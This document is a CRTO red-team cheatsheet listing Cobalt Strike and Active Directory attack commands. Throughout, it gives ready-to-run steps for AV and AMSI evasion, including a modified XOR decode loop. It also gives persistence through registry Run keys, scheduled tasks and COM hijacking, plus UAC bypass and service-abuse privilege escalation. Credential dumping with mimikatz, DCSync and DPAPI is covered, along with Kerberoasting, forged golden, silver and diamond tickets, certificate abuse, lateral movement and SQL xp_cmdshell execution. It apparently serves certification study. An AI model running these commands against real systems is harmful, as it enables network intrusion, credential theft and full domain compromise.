CRTO Cheatsheet

# Artifact Kit Build
./build.sh pipe VirtualAlloc 310272 5 false false none /path/to/artifacts

# Resource Kit Build
./build.sh /path/to/resources

# Mimikatz Kit Build
./build.sh /path/to/mimikatz

ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe

# Stage block
stage {
   set userwx "false";
   set module_x64 "Hydrogen.dll";
   set copy_pe_header "false";
}

# Post-ex block
post-ex {
  set amsi_disable "true";
  set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
  set obfuscate "true";
  set cleanup "true";
}

# Process-inject block
process-inject {
  execute {
      NtQueueApcThread-s;
      NtQueueApcThread;
      SetThreadContext;
      RtlCreateUserThread;
      CreateThread;
  }
}

# Verify artifact with ThreatCheck
C:\Tools\ThreatCheck\ThreatCheck.exe -f C:\path\to\artifact64svcbig.exe

# Named pipe (artifact kit)
sprintf(pipename, "%c%c%c%c%c%c%c%c%crasta\\mouse", 92, 92, 46, 92, 112, 105, 112, 101, 92);

# Session passing
spawn x64 <LISTENER>

# File operations
cd C:\Users\<USER>\Desktop
ls
download <FILE>
downloads

# Process listing
ps

# Keylogger
keylogger
jobs
jobkill <JOB_ID>

# Screenshots
printscreen
screenshot
screenwatch

# Command execution
shell whoami
run hostname
powershell <COMMAND>
powerpick <COMMAND>

# PowerShell import
powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# .NET Assembly execution
execute-assembly C:\Tools\Seatbelt\Seatbelt.exe -group=system

# Beacon Object File (BOF)
inline-execute C:\Tools\BOFs\ipconfig.o

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "<NAME>" -Value "<PAYLOAD_PATH>"

copy <PAYLOAD> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"

schtasks /create /tn "<TASK_NAME>" /tr "<PAYLOAD_PATH>" /sc onlogon /ru "<USER>"

# COM Hijacking (Teams example)
reg add "HKCU\Software\Classes\CLSID\{<CLSID>}\InprocServer32" /v "" /d "<DLL_PATH>" /f
reg add "HKCU\Software\Classes\CLSID\{<CLSID>}\InprocServer32" /v "ThreadingModel" /d "Both" /f

timestomp <TARGET_FILE> <REFERENCE_FILE>

powershell [Security.Principal.WindowsIdentity]::GetCurrent().Groups | ? {$_.Value -eq "S-1-16-12288"}

# Service enumeration
run sc query
run sc qc <SERVICE_NAME>

# Unquoted service path exploitation
# Upload beacon to unquoted path location
upload C:\Payloads\beacon.exe

# Weak service permissions
.\accesschk64.exe -uwcqv "<USER>" *
run sc config <SERVICE> binPath= "<PAYLOAD_PATH>"
run sc stop <SERVICE>
run sc start <SERVICE>

# UAC Bypass
elevate uac-schtasks <LISTENER>

# Connect to local TCP beacon
connect localhost <PORT>

schtasks /create /tn "<TASK_NAME>" /tr "<PAYLOAD_PATH>" /sc onstart /ru SYSTEM

sc create <SERVICE_NAME> binPath= "<PAYLOAD_PATH>" start= auto
sc start <SERVICE_NAME>

# Mimikatz - combine commands with ";"
mimikatz token::elevate ; lsadump::sam

# Logon passwords (NTLM hashes)
mimikatz !sekurlsa::logonpasswords

# Kerberos encryption keys
mimikatz !sekurlsa::ekeys

# SAM database dump
mimikatz !lsadump::sam

# Cached domain credentials
mimikatz !lsadump::cache

# DCSync (requires Domain Admin or replication rights)
dcsync <DOMAIN> <DOMAIN>\krbtgt

# Rubeus - Triage tickets
execute-assembly C:\Tools\Rubeus\Rubeus.exe triage

# Rubeus - Dump specific ticket
execute-assembly C:\Tools\Rubeus\Rubeus.exe dump /luid:<LUID> /service:krbtgt /nowrap

# Kerberoasting
execute-assembly C:\Tools\Rubeus\Rubeus.exe kerberoast /user:<SERVICE_USER> /nowrap

# AS-REP Roasting
execute-assembly C:\Tools\Rubeus\Rubeus.exe asreproast /user:<USER> /nowrap

# SharpChrome - Browser credentials
execute-assembly C:\Tools\SharpChrome\SharpChrome.exe logins

# SharpDPAPI - Credential Manager
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI.exe credentials /rpc

# Seatbelt - Vault enumeration
execute-assembly C:\Tools\Seatbelt\Seatbelt.exe WindowsVault

# Pass the Hash
pth <DOMAIN>\<USER> <NTLM_HASH>

# Make Token (plaintext password)
make_token <DOMAIN>\<USER> <PASSWORD>

# Overpass the Hash (request TGT)
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> /aes256:<AES256_HASH> /nowrap /opsec

# Pass the Ticket
execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<BASE64_TICKET>

# Steal Token from process
steal_token <PID>

# Revert to original token
rev2self

# Token Store (Cobalt 4.8+)
token-store steal <PID>
token-store use <TOKEN_ID>
token-store show

# Verify impersonation
run klist
ls \\<TARGET>.<DOMAIN>\c$

powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
powerpick Get-Domain
powerpick Get-DomainController | select Forest, Name, OSVersion | fl
powerpick Get-DomainUser -Identity <USER> -Properties DisplayName, MemberOf | fl
powerpick Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
powerpick Get-DomainOU -Properties Name | sort -Property Name
powerpick Get-DomainGroup | where Name -like "*Admins*" | select Name
powerpick Get-DomainGroupMember -Identity "<GROUP>" | select MemberName
powerpick Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
powerpick Get-DomainTrust

# SharpView
execute-assembly C:\Tools\SharpView\SharpView.exe Get-DomainUser -Identity <USER>

# ADSearch (LDAP queries)
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "objectCategory=user"
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(&(objectCategory=group)(cn=*admins*))" --attributes cn,member
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(objectCategory=trustedDomain)" --attributes distinguishedName,name,flatName,trustDirection

# ACL enumeration
powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "<SID_PATTERN>" }

# BOFHound (BloodHound integration)
inline-execute C:\Tools\BOFs\bofhound.o

# WinRM
jump winrm64 <TARGET>.<DOMAIN> <LISTENER>

# PsExec
jump psexec64 <TARGET>.<DOMAIN> <LISTENER>

# WMI
remote-exec wmi <TARGET>.<DOMAIN> <COMMAND>

# Remote PowerShell command
remote-exec winrm <TARGET> <COMMAND>

powershell-import C:\Tools\Invoke-DCOM.ps1
powerpick Invoke-DCOM -ComputerName <TARGET>.<DOMAIN> -Method MMC20.Application -Listener <LISTENER>

# Spawn new beacon (same or different listener)
spawn x64 <LISTENER>
spawn x86 <LISTENER>

# Spawn as different user
spawnas <DOMAIN>\<USER> <PASSWORD> <LISTENER>

# Foreign Listener (Meterpreter)
# Create Foreign HTTP/HTTPS listener in Cobalt Strike
# Then: shspawn x64 <FOREIGN_LISTENER>

# Inject into process
inject <PID> x64 <LISTENER>
shinject <PID> x64 C:\Payloads\payload.bin

socks 1080
socks 1080 socks5 disableNoAuth <USER> <PASSWORD> enableLogging

# Proxychains config (/etc/proxychains.conf)
# socks4 127.0.0.1 1080
# socks5 127.0.0.1 1080

# Linux tools through proxy
proxychains nmap -n -Pn -sT -p <PORTS> <TARGET_IP>
proxychains wmiexec.py <DOMAIN>/<USER>@<TARGET_IP>

# Reverse Port Forward
rportfwd <BIND_PORT> <FORWARD_HOST> <FORWARD_PORT>

# PortBender (redirect traffic)
PortBender redirect <SOURCE_PORT> <DEST_PORT>

# Firewall rule for port forward
netsh advfirewall firewall add rule name="<RULE_NAME>" dir=in action=allow protocol=TCP localport=<PORT>

proxychains python3 /usr/local/bin/getTGT.py <DOMAIN>/<USER> -dc-ip <DC_IP>
export KRB5CCNAME=/path/to/ticket.ccache

# Kerberoasting
execute-assembly C:\Tools\Rubeus\Rubeus.exe kerberoast /user:<SERVICE_USER> /nowrap

# AS-REP Roasting
execute-assembly C:\Tools\Rubeus\Rubeus.exe asreproast /user:<USER> /nowrap

# Unconstrained Delegation - Monitor for TGTs
execute-assembly C:\Tools\Rubeus\Rubeus.exe monitor /interval:10 /nowrap

# Constrained Delegation - S4U
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /impersonateuser:<TARGET_USER> /msdsspn:cifs/<TARGET>.<DOMAIN> /user:<SERVICE_USER> /ticket:<BASE64_TICKET> /nowrap

# Alternative Service Name
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /impersonateuser:<TARGET_USER> /msdsspn:cifs/<TARGET>.<DOMAIN> /altservice:ldap /user:<SERVICE_USER> /ticket:<BASE64_TICKET> /nowrap

# RBCD - Set msDS-AllowedToActOnBehalfOfOtherIdentity
powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<MACHINE_SID>)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "<TARGET>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose

# RBCD - Perform S4U
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /user:<MACHINE>$ /impersonateuser:<TARGET_USER> /msdsspn:cifs/<TARGET>.<DOMAIN> /ticket:<BASE64_TICKET> /nowrap

# Find Certificate Authorities
execute-assembly C:\Tools\Certify\Certify.exe cas

# Find vulnerable templates
execute-assembly C:\Tools\Certify\Certify.exe find /vulnerable

execute-assembly C:\Tools\Certify\Certify.exe request /ca:<CA_NAME> /template:<TEMPLATE> /altname:<TARGET_USER>

# NTLM Relay to ADCS HTTP endpoint
proxychains ntlmrelayx.py -t http://<CA_SERVER>/certsrv/certfnsh.asp -smb2support --adcs --template <TEMPLATE>

# Trigger printer bug
execute-assembly C:\Tools\SharpSpoolTrigger\SharpSpoolTrigger.exe <TARGET> <LISTENER_HOST>

ForgeCert.exe --CaCertPath <CA_CERT> --CaCertPassword <PASSWORD> --Subject "CN=<USER>" --SubjectAltName "<USER>@<DOMAIN>" --NewCertPath <OUTPUT> --NewCertPassword <PASSWORD>

powerpick Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "<SID>" }

powerpick Get-DomainOU -GPLink "{<GPO_ID>}" | select distinguishedName
powerpick (Get-DomainOU -GPLink "{<GPO_ID>}").distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

# SharpGPOAbuse - Add startup script
execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse.exe --AddComputerScript --ScriptName "<SCRIPT>" --ScriptContents "<COMMAND>" --GPOName "<GPO_NAME>"

# Create and Link new GPO
New-GPO -Name "<GPO_NAME>" | New-GPLink -Target "<OU_DN>"

ls C:\Users\<USER>\AppData\Local\Microsoft\Credentials\
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

mimikatz dpapi::cred /in:C:\path\to\credential_file

# Credential Manager vaults
vaultcmd /listcreds:"Windows Credentials" /all
execute-assembly C:\Tools\Seatbelt\Seatbelt.exe WindowsVault

# SharpDPAPI
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI.exe credentials /rpc

powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

# SQL Impersonation
# EXECUTE AS LOGIN = 'sa'
execute-assembly C:\Tools\SQLRecon\SQLRecon.exe /instance:<SQL_SERVER> /command:impersonate

# Enable xp_cmdshell
execute-assembly C:\Tools\SQLRecon\SQLRecon.exe /instance:<SQL_SERVER> /command:enablexp

# Execute OS commands
execute-assembly C:\Tools\SQLRecon\SQLRecon.exe /instance:<SQL_SERVER> /command:xp /argument:"whoami"

# SQL Linked Server enumeration
SELECT srvname, isremote FROM master..sysservers

# Query through linked server
SELECT * FROM OPENQUERY("<LINKED_SERVER>", 'SELECT * FROM information_schema.tables')

# Enable xp_cmdshell on linked server
EXEC('sp_configure ''show advanced options'', 1; RECONFIGURE') AT [<LINKED_SERVER>]
EXEC('sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [<LINKED_SERVER>]

# SweetPotato privilege escalation (SeImpersonatePrivilege)
execute-assembly C:\Tools\SweetPotato\SweetPotato.exe -p C:\Windows\Tasks\beacon.exe

execute-assembly C:\Tools\SharpSCCM\SharpSCCM.exe local site-info
execute-assembly C:\Tools\SharpSCCM\SharpSCCM.exe get collections
execute-assembly C:\Tools\SharpSCCM\SharpSCCM.exe get collection-members -n "<COLLECTION>"
execute-assembly C:\Tools\SharpSCCM\SharpSCCM.exe get devices -n "<DEVICE>"

execute-assembly C:\Tools\SharpSCCM\SharpSCCM.exe local naa

dcsync <DOMAIN> <DOMAIN>\krbtgt
mimikatz @lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\krbtgt

# Golden Ticket
execute-assembly C:\Tools\Rubeus\Rubeus.exe golden /aes256:<AES256_HASH> /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /nowrap

# Import Golden Ticket
execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<BASE64_TICKET>
steal_token <PID>

execute-assembly C:\Tools\Rubeus\Rubeus.exe silver /service:cifs/<TARGET>.<DOMAIN> /aes256:<AES256_HASH> /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /nowrap

execute-assembly C:\Tools\Rubeus\Rubeus.exe diamond /tgtdeleg /ticketuser:<USER> /ticketuserid:<RID> /groups:512 /krbkey:<AES256_HASH> /nowrap

# Forge Certificate
ForgeCert.exe --CaCertPath <CA_CERT> --CaCertPassword <PASSWORD> --Subject "CN=<USER>" --SubjectAltName "<USER>@<DOMAIN>" --NewCertPath <OUTPUT> --NewCertPassword <PASSWORD>

# DPAPI Domain Backup Key
mimikatz !lsadump::backupkeys /system:<DC>.<DOMAIN> /export

powerpick Get-DomainTrust
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(objectCategory=trustedDomain)" --domain <DOMAIN> --attributes distinguishedName,name,flatName,trustDirection

# Get child krbtgt hash via DCSync
dcsync <CHILD_DOMAIN> <CHILD_DOMAIN>\krbtgt

# Get Enterprise Admins SID
powerpick Get-DomainGroup -Identity "Enterprise Admins" -Domain <PARENT_DOMAIN> -Properties ObjectSid

# Forge golden ticket with SID History
execute-assembly C:\Tools\Rubeus\Rubeus.exe golden /aes256:<AES256_HASH> /user:<USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /sids:<ENTERPRISE_ADMINS_SID> /nowrap

powerpick Get-DomainForeignGroupMember -Domain <EXTERNAL_DOMAIN>
powerpick ConvertFrom-SID <SID>
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> /aes256:<AES256_HASH> /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgs /service:krbtgt/<EXTERNAL_DOMAIN> /domain:<DOMAIN> /dc:<DC>.<DOMAIN> /ticket:<BASE64_TICKET> /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgs /service:cifs/<TARGET>.<EXTERNAL_DOMAIN> /domain:<EXTERNAL_DOMAIN> /dc:<DC>.<EXTERNAL_DOMAIN> /ticket:<BASE64_TICKET> /nowrap

powerpick Get-DomainObject -Identity "CN=<TRUST_NAME>,CN=System,DC=<DOMAIN_DC>" | select objectGuid
mimikatz @lsadump::dcsync /domain:<DOMAIN> /guid:{<GUID>}
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:<TRUST_ACCOUNT>$ /domain:<EXTERNAL_DOMAIN> /rc4:<NTLM_HASH> /nowrap

powerpick Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath

powerpick Get-DomainComputer -SearchBase "<OU_DN>" -Properties cn

# Read LAPS password
powerpick Get-DomainComputer -Identity <COMPUTER> -Properties ms-Mcs-AdmPwd

# Check password expiration
powerpick Get-DomainComputer -Identity <COMPUTER> -Properties ms-Mcs-AdmPwdExpirationTime

powershell $ExecutionContext.SessionState.LanguageMode
# If ConstrainedLanguage, use:
powerpick $ExecutionContext.SessionState.LanguageMode
# Returns: FullLanguage

# Enumerate AppLocker policies
powershell Get-ChildItem "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

# Find writable directories
powershell Get-Acl C:\Windows\Tasks | fl

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe .\payload.csproj

# Artifact Kit - Modify XOR loop
# Change for loop to while loop for evasion
x = length;
while(x--) {
  *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
}

# Resource Kit - Modify template
# Rename functions and obfuscate PowerShell template
# Change XOR key value in decode loop

# AMSI Bypass - Obfuscate PowerShell
# Modify variable names and function names in templates

powerpick Find-DomainShare -CheckShareAccess

powerpick Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

# Query SQL databases through linked servers
powerpick Get-SQLQuery -Instance "<SQL_SERVER>,1433" -Query "select * from openquery(""<LINKED_SERVER>"", 'select * from information_schema.tables')"

# Extract data from SQL
powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "email,address,credit,card" -SampleSize 5 | select instance, database, column, sample | ft -autosize